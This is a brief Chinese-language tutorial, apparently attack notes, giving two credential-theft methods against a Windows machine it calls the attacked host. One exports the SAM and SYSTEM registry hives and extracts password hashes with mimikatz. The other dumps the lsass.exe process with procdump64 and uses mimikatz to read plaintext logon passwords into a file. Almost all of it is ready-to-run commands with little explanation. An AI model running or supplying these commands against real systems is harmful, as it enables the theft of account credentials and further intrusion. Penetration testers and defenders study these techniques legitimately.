第一种
下载被攻击机的注册表到本地,使用mimikatz
读取密码
-
管理员执行cmd
reg save HKLM\SYSTEM C:\sys.hiv
reg save HKLM\SAM C:\sam.hiv
导出注册表文件
-
下载
mimikatz
https://github.com/gentilkiwi/mimikatz/releases
配置环境变量
- 我们在c盘目录下,命令行直接执行
mimikatz.exe
lsadump::sam /sam:sam.hiv /system:sys.hiv
第二种
procdump64+mimikatz可实现从内存中获取明文密码
命令行:tasklist
# 查看进程
可以看到有一个 lsass.exe 的进程,用于本地安全和登陆策略
下载procdump64
工具 (路径添加到环境变量使用方面一点)
- procdump64.exe -accepteula -ma lsass.exe lsass.dmp # 导出lsass.exe 进程
已经下载到c 盘了
使用mimikatz.exe 工具 - mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonPasswords full” exit
或者 直接输出到文本
mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonPasswords full” > pass.txt